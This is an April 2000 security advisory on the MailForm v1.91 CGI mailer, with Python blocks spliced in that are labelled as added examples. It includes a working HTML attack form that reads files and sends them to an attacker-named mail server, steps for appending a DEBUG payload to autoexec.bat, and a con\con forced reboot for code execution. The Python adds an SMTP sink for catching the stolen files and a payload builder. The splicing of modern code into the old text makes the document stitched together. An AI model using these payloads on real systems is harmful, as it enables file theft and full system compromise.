mailform.txt
Chopsui-cide
packetstormsecurity.com (PACKETSTORM:17520)
2000-04-07 00:00:00
`Advisory: MailForm v1.91 for Windows 95 and NT 4.0  
Chopsui-cide[MmM]  
The Mad Midget Mafia - http://midgets.box.sk/  
=======================================================================  
Do not save this with any editor, or _vital_ formatting may be lost.  
  
Disclaimer:  
=============  
This document is intended as an advisory, and I cannot be held  
accountable for its misuse. The reader assumes all responsibility for  
his/her use of this information.  
  
Summary:  
==========  
Date released: 07/04/2000 (dd/mm/yyyy).  
Risk: denial of service, reading of private files, appending to  
private files, full system compromise if the aforementioned risks  
are leveraged properly.  
Vulnerability found by: Chopsui-cide  
Vulnerable: MailForm v1.91, probably prior versions (not tested).  
Immune: ?  
  
MailForm allows potentially dangerous parameters to be specified by  
anyone who can execute it. These allow for reading and writing of  
files on the system on which MailForm resides.  
  
Details:  
==========  
Problem fields:  
_1_TextLog -  
_1_HTMLLog - these two are the ones used to write to files.  
_1_MailTemplate - this is what is used to retrieve files.  
_1_INIFile - possibly dangerous, but not discussed here.  
_1_MailServer - we can just change this to our own address.  
_1_MailTo - we don't even need to bother with this.  
  
It's fairly obvious where the problem lies here. We can specify any  
file to send and the mail server it is delivered to (SMTP, port 25;  
whatever host _1_MailServer names). The con\con bug may also be used  
to bring down the entire system (this applies to Windows 9x hosts,  
which crash on a path such as c:\con\con; NT 4.0 is not affected).  
Template files will be cut off at the first null character, so  
retrieving binaries is not practical. Trying to retrieve certain files  
will cause MailForm to crash.  
  
A very crude example of how to run code on the remote system is  
provided in the last section of this advisory.  
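  
As an added example (not MailForm's code, and not part of this  
advisory): the same parameters handled the way they should have been.  
The directory layout, the function names and the `safe_resolve` helper  
are assumptions for illustration; `vulnerable_resolve` shows the  
trusting behaviour the fields above exhibit, `safe_resolve` the checks  
that close each of the three problems (traversal, absolute paths,  
DOS device names).  

```python
import ntpath

# Assumed layout for the example; MailForm's real install paths are not on the page.
TEMPLATE_ROOT = r"C:\inetpub\mailform\templates"
LOG_ROOT = r"C:\inetpub\mailform\logs"

# DOS device names. A path component with one of these stems opens the
# device, not a file, whatever directory it appears in (con\con is the
# Windows 9x crash used later in the advisory; nul is the sink used in the
# append form). Windows ignores an extension, so "con.txt" is still CON.
RESERVED = ({"CON", "PRN", "AUX", "NUL", "CLOCK$"}
            | {"COM%d" % i for i in range(1, 10)}
            | {"LPT%d" % i for i in range(1, 10)})


class BadPath(ValueError):
    """Raised for any parameter value that must not reach the filesystem."""


def vulnerable_resolve(root, param):
    """The pattern the advisory describes: trust the form field as a path.
    Nothing stops '..', a drive letter, or a device name."""
    return ntpath.normpath(ntpath.join(root, param))


def _is_reserved(component):
    stem = component.split(".", 1)[0].rstrip(" ").upper()
    return stem in RESERVED


def safe_resolve(root, param):
    """Accept a relative name, reject traversal, absolute paths and device
    names, and prove the final path is still under `root`."""
    if not param or "\x00" in param:
        raise BadPath("empty or NUL-containing name")
    drive, rest = ntpath.splitdrive(param)
    if drive or rest.startswith(("\\", "/")):
        raise BadPath("absolute path or drive letter: %r" % param)
    for comp in rest.replace("/", "\\").split("\\"):
        if comp in ("", ".", ".."):
            raise BadPath("empty or traversal component: %r" % param)
        if _is_reserved(comp):
            raise BadPath("DOS device name: %r" % comp)
    full = ntpath.normpath(ntpath.join(root, rest))
    # Belt and braces: even after the checks above, refuse anything that
    # does not share `root` as its common prefix.
    if ntpath.commonpath([root, full]) != ntpath.normpath(root):
        raise BadPath("escapes %s: %r" % (root, full))
    return full


if __name__ == "__main__":
    for root, field, value in ((TEMPLATE_ROOT, "_1_MailTemplate", "..\\xitami.aut"),
                               (TEMPLATE_ROOT, "_1_MailTemplate", "con\\con"),
                               (LOG_ROOT, "_1_TextLog", "c:\\autoexec.bat"),
                               (TEMPLATE_ROOT, "_1_MailTemplate", "order.tpl")):
        print(field, value, "->", vulnerable_resolve(root, value), "(as MailForm sees it)")
        try:
            print(field, value, "->", safe_resolve(root, value))
        except BadPath as e:
            print(field, value, "-> rejected:", e)
```

The device-name check is the part most often forgotten: a path check  
that only looks for `..` and drive letters still lets `con\con` or  
`nul` through, and on Windows 9x the first of those is the reboot  
used at the end of this advisory.  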
  
Implementation: web interface  
===============================  
I have constructed some html that allows an attacker to download and  
append to files on any remote system running MailForm (cut where it  
says [snip], obviously):  
  
[snip]  
<html>  
<head>  
<title>Web interface for MailForm vulnerabilities.</title>  
</head>  
<body bgcolor="#FFFFFF">  
Do not be alarmed by any "Form submission failed" errors. These are  
normal. You will need to modify the form tags in this page to  
correspond to the host being attacked.<br>  
<br>  
Download file:<br>  
  
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">  
<input type="text" name="_1_MailServer" value="yourhost"><br>  
<input type="text" name="_1_MailTemplate" value="..\xitami.aut"><br>  
<input type="hidden" size="30" name="_1_MailTo" value="[email protected]">  
<input type="hidden" size="40" name="Name" value="me">  
<input type="submit" value="Send" name="_2_Submit">  
</form>  
<br>  
Append to file:<br>  
Note: your text will be preceded by garbage.<br>  
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">  
<input type="hidden" name="_1_MailServer" value="x">  
<input type="hidden" name="_1_MailTemplate" value="nul">  
<input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"><br>  
<input type="hidden" size="30" name="_1_MailTo" value="[email protected]">  
<textarea name="Name" rows="4" cols="40"></textarea>  
<br><input type="submit" value="Send" name="_2_Submit">  
</form>  
<a href="http://midgets.box.sk">The Mad Midget Mafia</a><br>  
</body>  
</html>  
[snip]  
  
The e-mail will be sent to the host you specify on port 25. It should  
be easy enough to capture using netcat.  
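  
An added example, not part of the advisory: a throwaway SMTP sink that  
does what the netcat capture does, plus a constructed client standing  
in for MailForm's delivery (MailForm's actual SMTP dialogue is not  
documented here; the host names, recipient and template text are made  
up). It runs end to end on localhost so the exchange can be seen  
without a vulnerable host.  

```python
import socket
import threading


def smtp_sink(listener):
    """Accept one connection and speak just enough SMTP to receive the
    message: every command gets '250 ok', DATA gets '354' and the body is
    collected up to the lone '.' line (with RFC 5321 dot-unstuffing)."""
    conn, _peer = listener.accept()
    captured = {"envelope": [], "data": b""}
    with conn, conn.makefile("rb") as rfile:
        conn.sendall(b"220 sink ready\r\n")
        while True:
            line = rfile.readline()
            if not line:
                break
            verb = line.split(b" ", 1)[0].rstrip(b"\r\n:").upper()
            if verb == b"DATA":
                conn.sendall(b"354 end with <CRLF>.<CRLF>\r\n")
                body = []
                while True:
                    l = rfile.readline()
                    if not l or l.rstrip(b"\r\n") == b".":
                        break
                    body.append(l[1:] if l.startswith(b"..") else l)
                captured["data"] = b"".join(body)
                conn.sendall(b"250 queued\r\n")
            elif verb == b"QUIT":
                conn.sendall(b"221 bye\r\n")
                break
            else:
                captured["envelope"].append(line.rstrip(b"\r\n").decode("latin-1"))
                conn.sendall(b"250 ok\r\n")
    return captured


def fake_mailform_delivery(host, port, rcpt, message):
    """Constructed stand-in for the delivery MailForm makes once _1_MailServer
    points at us: a plain HELO/MAIL/RCPT/DATA/QUIT client. Lines starting
    with '.' are dot-stuffed as the protocol requires."""
    lines = message.replace("\r\n", "\n").split("\n")
    wire = b"\r\n".join((("." + ln) if ln.startswith(".") else ln).encode("latin-1")
                        for ln in lines)
    with socket.create_connection((host, port)) as s, s.makefile("rb") as r:
        r.readline()                                   # 220 banner
        for cmd in (b"HELO victim", b"MAIL FROM:<mailform@victim>",
                    b"RCPT TO:<" + rcpt.encode("ascii") + b">", b"DATA"):
            s.sendall(cmd + b"\r\n")
            r.readline()                               # 250 / 354
        s.sendall(wire + b"\r\n.\r\n")
        r.readline()                                   # 250 queued
        s.sendall(b"QUIT\r\n")
        r.readline()                                   # 221


def capture_exfiltrated_file(message, rcpt="anyone@yourhost"):
    """Run the sink on an ephemeral localhost port, deliver `message` to it
    and return what the sink captured. Against a real MailForm, bind port
    25 on the host named in _1_MailServer instead."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}
    t = threading.Thread(target=lambda: result.update(smtp_sink(listener)), daemon=True)
    t.start()
    try:
        fake_mailform_delivery("127.0.0.1", port, rcpt, message)
    finally:
        t.join(timeout=5)
        listener.close()
    return result


if __name__ == "__main__":
    # Constructed stand-in for whatever file _1_MailTemplate was pointed at.
    sample = "CONSTRUCTED template contents\n.a line starting with a dot\nlast line"
    got = capture_exfiltrated_file(sample)
    print("envelope:", got["envelope"])
    print("data:", got["data"].decode("latin-1"))
```

Whatever the CGI substitutes into the template is of no interest;  
the point is that the template body arrives verbatim in the DATA  
section, so a sink that only implements DATA correctly (including the  
dot-unstuffing) is enough to read the file back.  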
  
Implementation: full compromise  
=================================  
When appending text to files, the following kind of ugly crap  
precedes it:  
[snip]  
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1  
  
Name:  
[snip]  
Even with this handicap, we can still modify/create batch files.  
This is how we will execute code.  
  
The idea here is to create a kind of "script" for debug that will  
assemble and execute a small program. It is basically just a list of  
keystrokes. We then add an entry to autoexec.bat that executes it.  
First we need to upload the following file to c:\windows\script.txt  
[snip]  
  
a 100  
mov dx,10b  
mov ah,09  
int 21  
mov ah,4c  
int 21  
db "Code has been executed.",0d,0a,"$"  
  
g=100  
q  
[snip]  
  
Make sure at the end of each line there is _no_ carriage return. Each  
line should be terminated by \x0a (linefeed). Get rid of the carriage  
returns (\x0d); the listing below is the same script with linefeeds  
only, which renders identically but differs byte for byte (hence the  
warning at the top about editors):  
a 100  
mov dx,10b  
mov ah,09  
int 21  
mov ah,4c  
int 21  
db "Code has been executed.",0d,0a,"$"  
  
g=100  
q  
  
  
Add a newline (\x0d,\x0a) before the above so that "a 100" does not  
land on the "Name:" line, and submit the whole script using the  
web-based interface (the "Append to file" form, with _1_TextLog set to  
c:\windows\script.txt).  
  
Add the following line to any batch file that is executed upon start-up  
(ie, autoexec.bat):  
debug < c:\windows\script.txt  
  
Check that everything is in order by trying to download both script.txt  
and the batch file you modified.  
  
Force a reboot using the con\con vulnerability. Once it restarts, the  
code will be executed. I know this is a really ugly hack, but it works  
(poor excuse). Also, make sure the garbage doesn't interfere with  
anything (always put a newline before the start of your commands).  
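  
An added example rather than the author's tooling: build the two  
appends from this section, mimic what MailForm writes in front of them  
(the timestamp and address are constructed, and the "Name: " prefix  
with a trailing space is assumed from the sample above), and run the  
checks the text asks for: no carriage returns, "a 100" on its own  
line, a blank line before g=100, and the `mov dx,10b` operand matching  
where the db string actually lands once the instructions before it are  
assembled.  

```python
import re

# The advisory's DEBUG script, exactly as it must reach c:\windows\script.txt:
# LF-only, with a blank line after the db to leave assemble mode before 'g'.
DEBUG_SCRIPT = (
    "a 100\n"
    "mov dx,10b\n"
    "mov ah,09\n"
    "int 21\n"
    "mov ah,4c\n"
    "int 21\n"
    'db "Code has been executed.",0d,0a,"$"\n'
    "\n"
    "g=100\n"
    "q\n"
)
BATCH_LINE = "debug < c:\\windows\\script.txt"

# Encoded sizes of the real-mode instructions the script uses:
# mov r16,imm16 is 3 bytes, mov r8,imm8 is 2, int imm8 is 2.
_SIZES = (
    (re.compile(r"^mov (ax|bx|cx|dx|si|di|bp|sp),[0-9a-f]{1,4}$"), 3),
    (re.compile(r"^mov (al|ah|bl|bh|cl|ch|dl|dh),[0-9a-f]{1,2}$"), 2),
    (re.compile(r"^int [0-9a-f]{1,2}$"), 2),
)


def string_offset(script):
    """Where the db line lands: the 'a' origin plus the bytes assembled before
    it. This is the value 'mov dx' must carry for int 21h/AH=09h to print it."""
    lines = script.split("\n")
    origin = int(lines[0].split()[1], 16)          # "a 100"
    offset = origin
    for line in lines[1:]:
        if line.startswith("db "):
            return offset
        for pattern, size in _SIZES:
            if pattern.match(line):
                offset += size
                break
        else:
            raise ValueError("no size rule for %r" % line)
    raise ValueError("no db line")


def dx_operand(script):
    """The immediate the script actually loads into DX."""
    return int(re.search(r"^mov dx,([0-9a-f]+)$", script, re.M).group(1), 16)


def textarea_payload(text, lead_newline=True):
    """Bytes for the Name textarea: CRs removed, optionally a leading newline
    so the first command does not end up on MailForm's 'Name:' line."""
    body = text.replace("\r\n", "\n").replace("\r", "\n")
    return (("\n" if lead_newline else "") + body).encode("ascii")


def mailform_append(existing, name_field,
                    when="Thu Apr 06 22:14:49 2000", ip="192.168.1.1"):
    """Mimic the _1_TextLog append the advisory shows (header, blank line,
    'Name: ' and the field). The timestamp and address are constructed."""
    header = ("Submitted at %s from %s\n\nName: " % (when, ip)).encode("ascii")
    return existing + header + name_field


def check_script_file(contents):
    """The checks to run on script.txt after downloading it back."""
    lines = contents.split(b"\n")
    g = lines.index(b"g=100") if b"g=100" in lines else -1
    return {
        "has_cr": b"\r" in contents,
        "assemble_on_own_line": b"a 100" in lines,
        "assemble_closed_before_go": g > 0 and lines[g - 1] == b"",
    }


if __name__ == "__main__":
    print("db lands at %x, mov dx loads %x" % (string_offset(DEBUG_SCRIPT), dx_operand(DEBUG_SCRIPT)))
    script_txt = mailform_append(b"", textarea_payload(DEBUG_SCRIPT))
    print(check_script_file(script_txt))
    print(check_script_file(mailform_append(b"", textarea_payload(DEBUG_SCRIPT, lead_newline=False))))
    print(mailform_append(b"@echo off\n", textarea_payload(BATCH_LINE)).decode("ascii"))
```

The same prefix lands in autoexec.bat. COMMAND.COM treats "Submitted  
at ..." and "Name:" as commands, reports "Bad command or file name"  
for each and carries on, so the leading newline matters there too;  
without it the debug line is glued onto "Name:" and never runs.  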
  
=======================================================================  
  
`